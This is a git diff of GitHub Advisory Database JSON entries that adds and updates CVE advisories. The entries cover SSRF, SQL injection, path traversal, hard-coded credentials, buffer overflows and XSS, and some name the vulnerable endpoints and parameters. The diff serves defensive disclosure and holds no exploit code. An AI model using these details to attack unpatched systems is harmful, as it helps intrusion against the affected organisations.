b/advisories/unreviewed/2022/05/GHSA-qfxw-56c6-7pjg/GHSA-qfxw-56c6-7pjg.json index eb36aefe1a1a5..7debe1c13b804 100644 --- a/advisories/unreviewed/2022/05/GHSA-qfxw-56c6-7pjg/GHSA-qfxw-56c6-7pjg.json +++ b/advisories/unreviewed/2022/05/GHSA-qfxw-56c6-7pjg/GHSA-qfxw-56c6-7pjg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qfxw-56c6-7pjg", - "modified": "2022-05-24T17:09:16Z", + "modified": "2026-02-17T21:31:12Z", "published": "2022-05-24T17:09:16Z", "aliases": [ "CVE-2020-7796" ], "details": "Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -17,10 +22,16 @@ { "type": "WEB", "url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-7796" } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-918" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-9c5h-6x6r-hvxh/GHSA-9c5h-6x6r-hvxh.json b/advisories/unreviewed/2024/05/GHSA-9c5h-6x6r-hvxh/GHSA-9c5h-6x6r-hvxh.json index d88d43a4049ba..4dc0b9965119a 100644 --- a/advisories/unreviewed/2024/05/GHSA-9c5h-6x6r-hvxh/GHSA-9c5h-6x6r-hvxh.json +++ b/advisories/unreviewed/2024/05/GHSA-9c5h-6x6r-hvxh/GHSA-9c5h-6x6r-hvxh.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-9c5h-6x6r-hvxh", - "modified": "2024-05-02T15:30:33Z", + "modified": "2026-02-17T21:31:12Z", "published": "2024-05-02T15:30:33Z", "aliases": [ "CVE-2024-23462" ], - "details": "An Improper Validation of Integrity Check Value vulnerability in Zscaler Client Connector on MacOS allows a denial of service of the Client Connector binary and thus removing client functionality.This issue affects Client Connector on MacOS: before 3.4.\n\n", + "details": "An Improper Validation of Integrity Check Value vulnerability in Zscaler Client Connector on MacOS allows a denial of service of the Client Connector binary and thus removing client functionality.This issue affects Client Connector on MacOS: before 3.4.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/unreviewed/2024/05/GHSA-gvpq-95j2-mc36/GHSA-gvpq-95j2-mc36.json b/advisories/unreviewed/2024/05/GHSA-gvpq-95j2-mc36/GHSA-gvpq-95j2-mc36.json index d94d99481d639..e598400c1c2ad 100644 --- a/advisories/unreviewed/2024/05/GHSA-gvpq-95j2-mc36/GHSA-gvpq-95j2-mc36.json +++ b/advisories/unreviewed/2024/05/GHSA-gvpq-95j2-mc36/GHSA-gvpq-95j2-mc36.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-gvpq-95j2-mc36", - "modified": "2024-05-01T18:30:41Z", + "modified": "2026-02-17T21:31:12Z", "published": "2024-05-01T18:30:41Z", "aliases": [ "CVE-2024-23480" ], - "details": "A fallback mechanism in code sign checking on macOS may allow arbitrary code execution. This issue affects Zscaler Client Connector on MacOS prior to 4.2.\n", + "details": "A fallback mechanism in code sign checking on macOS may allow arbitrary code execution. This issue affects Zscaler Client Connector on MacOS prior to 4.2.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/unreviewed/2024/08/GHSA-22f5-q5gp-64wx/GHSA-22f5-q5gp-64wx.json b/advisories/unreviewed/2024/08/GHSA-22f5-q5gp-64wx/GHSA-22f5-q5gp-64wx.json index 3f9e989b77385..ecc2f40d787dc 100644 --- a/advisories/unreviewed/2024/08/GHSA-22f5-q5gp-64wx/GHSA-22f5-q5gp-64wx.json +++ b/advisories/unreviewed/2024/08/GHSA-22f5-q5gp-64wx/GHSA-22f5-q5gp-64wx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-22f5-q5gp-64wx", - "modified": "2024-08-12T15:30:53Z", + "modified": "2026-02-17T21:31:12Z", "published": "2024-08-12T15:30:53Z", "aliases": [ "CVE-2024-7694" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7694" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-7694" + }, { "type": "WEB", "url": "https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html" diff --git a/advisories/unreviewed/2025/12/GHSA-q28j-qr7m-gpf6/GHSA-q28j-qr7m-gpf6.json b/advisories/unreviewed/2025/12/GHSA-q28j-qr7m-gpf6/GHSA-q28j-qr7m-gpf6.json index c7b99372395b1..a358c19b0d270 100644 --- a/advisories/unreviewed/2025/12/GHSA-q28j-qr7m-gpf6/GHSA-q28j-qr7m-gpf6.json +++ b/advisories/unreviewed/2025/12/GHSA-q28j-qr7m-gpf6/GHSA-q28j-qr7m-gpf6.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q28j-qr7m-gpf6", - "modified": "2025-12-09T21:31:48Z", + "modified": "2026-02-17T21:31:12Z", "published": "2025-12-09T21:31:48Z", "aliases": [ "CVE-2021-47723" ], "details": "STVS ProVision 5.9.10 contains a cross-site request forgery vulnerability that allows attackers to perform actions with administrative privileges by exploiting unvalidated HTTP requests. Attackers can visit malicious web sites to trigger the forge request, allowing them to create new admin users.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-3hmm-3q3p-7x72/GHSA-3hmm-3q3p-7x72.json b/advisories/unreviewed/2026/01/GHSA-3hmm-3q3p-7x72/GHSA-3hmm-3q3p-7x72.json index 0b9e96235155f..f4a7c5765d522 100644 --- a/advisories/unreviewed/2026/01/GHSA-3hmm-3q3p-7x72/GHSA-3hmm-3q3p-7x72.json +++ b/advisories/unreviewed/2026/01/GHSA-3hmm-3q3p-7x72/GHSA-3hmm-3q3p-7x72.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json index c399c22289ffd..333534747ecbc 100644 --- a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json +++ b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8x3f-4jvw-ww73", - "modified": "2026-02-12T15:32:42Z", + "modified": "2026-02-17T21:31:12Z", "published": "2026-01-08T15:31:25Z", "aliases": [ "CVE-2026-0719" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2026-0719" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2844" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2628" diff --git a/advisories/unreviewed/2026/01/GHSA-fm67-x2fw-2g76/GHSA-fm67-x2fw-2g76.json b/advisories/unreviewed/2026/01/GHSA-fm67-x2fw-2g76/GHSA-fm67-x2fw-2g76.json index b589234d050fa..188a13aa111c8 100644 --- a/advisories/unreviewed/2026/01/GHSA-fm67-x2fw-2g76/GHSA-fm67-x2fw-2g76.json +++ b/advisories/unreviewed/2026/01/GHSA-fm67-x2fw-2g76/GHSA-fm67-x2fw-2g76.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fm67-x2fw-2g76", - "modified": "2026-01-27T09:30:30Z", + "modified": "2026-02-17T21:31:12Z", "published": "2026-01-27T09:30:30Z", "aliases": [ "CVE-2026-24811" ], "details": "Vulnerability in root-project root (builtins/zlib modules). This vulnerability is associated with program files inffast.C.\n\nThis issue affects root.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/01/GHSA-j644-xc9q-497g/GHSA-j644-xc9q-497g.json b/advisories/unreviewed/2026/01/GHSA-j644-xc9q-497g/GHSA-j644-xc9q-497g.json index 4166562021083..8cc260ba8ab7e 100644 --- a/advisories/unreviewed/2026/01/GHSA-j644-xc9q-497g/GHSA-j644-xc9q-497g.json +++ b/advisories/unreviewed/2026/01/GHSA-j644-xc9q-497g/GHSA-j644-xc9q-497g.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j644-xc9q-497g", - "modified": "2026-01-27T09:30:29Z", + "modified": "2026-02-17T21:31:12Z", "published": "2026-01-27T09:30:29Z", "aliases": [ "CVE-2026-24793" ], "details": "Out-of-bounds Write, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in azerothcore azerothcore-wotlk (deps/zlib modules). This vulnerability is associated with program files inflate.C.\n\nThis issue affects azerothcore-wotlk: through v4.0.0.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:L/U:Red" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-120" + "CWE-120", + "CWE-787" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-prgg-gmcv-8hj2/GHSA-prgg-gmcv-8hj2.json b/advisories/unreviewed/2026/01/GHSA-prgg-gmcv-8hj2/GHSA-prgg-gmcv-8hj2.json index 1ce35dbb26939..9fee24a351dfe 100644 --- a/advisories/unreviewed/2026/01/GHSA-prgg-gmcv-8hj2/GHSA-prgg-gmcv-8hj2.json +++ b/advisories/unreviewed/2026/01/GHSA-prgg-gmcv-8hj2/GHSA-prgg-gmcv-8hj2.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-wmgp-r59p-x29f/GHSA-wmgp-r59p-x29f.json b/advisories/unreviewed/2026/01/GHSA-wmgp-r59p-x29f/GHSA-wmgp-r59p-x29f.json index 6de5ecfbeced5..7a84875c7dd99 100644 --- a/advisories/unreviewed/2026/01/GHSA-wmgp-r59p-x29f/GHSA-wmgp-r59p-x29f.json +++ b/advisories/unreviewed/2026/01/GHSA-wmgp-r59p-x29f/GHSA-wmgp-r59p-x29f.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-2gp2-mfg4-q5mv/GHSA-2gp2-mfg4-q5mv.json b/advisories/unreviewed/2026/02/GHSA-2gp2-mfg4-q5mv/GHSA-2gp2-mfg4-q5mv.json new file mode 100644 index 0000000000000..3e294d6d86790 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2gp2-mfg4-q5mv/GHSA-2gp2-mfg4-q5mv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gp2-mfg4-q5mv", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2023-38265" + ], + "details": "IBM Cloud Pak System 2.3.3.6, 2.3.3.7, 2.3.4.0, 2.3.4.1, and 2.3.5.0 could disclose folder location information to an unauthenticated attacker that could aid in further attacks against the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38265" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259955" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-548" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3mc6-qj9j-9v96/GHSA-3mc6-qj9j-9v96.json b/advisories/unreviewed/2026/02/GHSA-3mc6-qj9j-9v96/GHSA-3mc6-qj9j-9v96.json index c16dcf57eb8bd..790f87e4c1b05 100644 --- a/advisories/unreviewed/2026/02/GHSA-3mc6-qj9j-9v96/GHSA-3mc6-qj9j-9v96.json +++ b/advisories/unreviewed/2026/02/GHSA-3mc6-qj9j-9v96/GHSA-3mc6-qj9j-9v96.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3mc6-qj9j-9v96", - "modified": "2026-02-17T18:32:57Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2026-23647" ], "details": "Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrative privileges, were found to have fixed, embedded passwords. An attacker with network access to exposed services such as SSH may authenticate using these credentials and gain unauthorized access to the system. Successful exploitation allows remote access with elevated privileges and may result in full system compromise.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-3q38-qghq-9hmp/GHSA-3q38-qghq-9hmp.json b/advisories/unreviewed/2026/02/GHSA-3q38-qghq-9hmp/GHSA-3q38-qghq-9hmp.json new file mode 100644 index 0000000000000..661cd8643e9c1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3q38-qghq-9hmp/GHSA-3q38-qghq-9hmp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3q38-qghq-9hmp", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-26357" + ], + "details": "Dell Unisphere for PowerMax, version(s) 9.2.4.x, contain(s) an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to the execution of malicious HTML or JavaScript code in a victim user's web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26357" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json b/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json index 6987564cf8676..217864fdb1de3 100644 --- a/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json +++ b/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json @@ -53,7 +53,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-77" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3w38-x6jp-8474/GHSA-3w38-x6jp-8474.json b/advisories/unreviewed/2026/02/GHSA-3w38-x6jp-8474/GHSA-3w38-x6jp-8474.json new file mode 100644 index 0000000000000..80b43ceb0bed4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3w38-x6jp-8474/GHSA-3w38-x6jp-8474.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w38-x6jp-8474", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36377" + ], + "details": "IBM Security QRadar EDR 3.12 through 3.12.23 does not invalidate session after a session expiration which could allow an authenticated user to impersonate another user on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36377" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260390" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4586-432g-jmvg/GHSA-4586-432g-jmvg.json b/advisories/unreviewed/2026/02/GHSA-4586-432g-jmvg/GHSA-4586-432g-jmvg.json new file mode 100644 index 0000000000000..f1bdc63b7a753 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4586-432g-jmvg/GHSA-4586-432g-jmvg.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4586-432g-jmvg", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-59793" + ], + "details": "Rocket TRUfusion Enterprise through 7.10.5 exposes the endpoint at /axis2/services/WsPortalV6UpDwAxis2Impl to authenticated users to be able to upload files. However, the application doesn't properly sanitize the jobDirectory parameter, which allows path traversal sequences to be included. This allows writing files to arbitrary local filesystem locations and may subsequently lead to remote code execution.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59793" + }, + { + "type": "WEB", + "url": "https://www.rcesecurity.com" + }, + { + "type": "WEB", + "url": "https://www.rcesecurity.com/advisories/cve-2025-59793" + }, + { + "type": "WEB", + "url": "https://www.rocketsoftware.com/en-us/products/b2b-supply-chain-integration/trufusion" + }, + { + "type": "WEB", + "url": "https://www.rocketsoftware.com/products/rocket-b2b-supply-chain-integration/rocket-trufusion-enterprise" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4c5g-pgmw-3hxj/GHSA-4c5g-pgmw-3hxj.json b/advisories/unreviewed/2026/02/GHSA-4c5g-pgmw-3hxj/GHSA-4c5g-pgmw-3hxj.json new file mode 100644 index 0000000000000..b5846de186da7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4c5g-pgmw-3hxj/GHSA-4c5g-pgmw-3hxj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4c5g-pgmw-3hxj", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-2620" + ], + "details": "A weakness has been identified in Huace Monitoring and Early Warning System 2.2. Affected by this issue is some unknown functionality of the file /Web/SysManage/ProjectRole.aspx. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2620" + }, + { + "type": "WEB", + "url": "https://github.com/red88-debug/CVEs/blob/main/Huace%20Monitoring%20and%20Early%20Warning%20SQL.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346271" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346271" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751808" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4rxf-gw9p-prj2/GHSA-4rxf-gw9p-prj2.json b/advisories/unreviewed/2026/02/GHSA-4rxf-gw9p-prj2/GHSA-4rxf-gw9p-prj2.json new file mode 100644 index 0000000000000..c062b433b2192 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4rxf-gw9p-prj2/GHSA-4rxf-gw9p-prj2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rxf-gw9p-prj2", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-14289" + ], + "details": "IBM webMethods Integration Server 12.0 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14289" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260932" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-58rc-3q27-grhq/GHSA-58rc-3q27-grhq.json b/advisories/unreviewed/2026/02/GHSA-58rc-3q27-grhq/GHSA-58rc-3q27-grhq.json new file mode 100644 index 0000000000000..5437602e37464 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-58rc-3q27-grhq/GHSA-58rc-3q27-grhq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58rc-3q27-grhq", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-36019" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 for Z hub framework is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36019" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json new file mode 100644 index 0000000000000..8b64705509c5c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fc6-h8m7-2wfc", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-23597" + ], + "details": "Vulnerabilities in the API error handling of an HPE Aruba Networking 5G Core server API could allow an unauthenticated remote attacker to obtain sensitive information. Successful exploitation could allow an attacker to access details such as user accounts, roles, and system configuration, as well as to gain insight into internal services and workflows, increasing the risk of unauthorized access and elevated privileges when combined with other vulnerabilities.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23597" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05002en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fpg-jg99-g97m/GHSA-5fpg-jg99-g97m.json b/advisories/unreviewed/2026/02/GHSA-5fpg-jg99-g97m/GHSA-5fpg-jg99-g97m.json index d64eaf37f17b8..58a61d78b3ff4 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fpg-jg99-g97m/GHSA-5fpg-jg99-g97m.json +++ b/advisories/unreviewed/2026/02/GHSA-5fpg-jg99-g97m/GHSA-5fpg-jg99-g97m.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-862" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json b/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json new file mode 100644 index 0000000000000..45b9c46c02bb7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jg4-px58-ghq6", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-26736" + ], + "details": "TOTOLINK A3002RU_V3 V3.0.0-B20220304.1804 was discovered to contain a stack-based buffer overflow via the static_ipv6 parameter in the formIpv6Setup function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26736" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RUV3.0-boa-formIpv6Setup-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5mcc-f9f9-29w9/GHSA-5mcc-f9f9-29w9.json b/advisories/unreviewed/2026/02/GHSA-5mcc-f9f9-29w9/GHSA-5mcc-f9f9-29w9.json new file mode 100644 index 0000000000000..2be76a60f6e95 --- /dev/null +++ 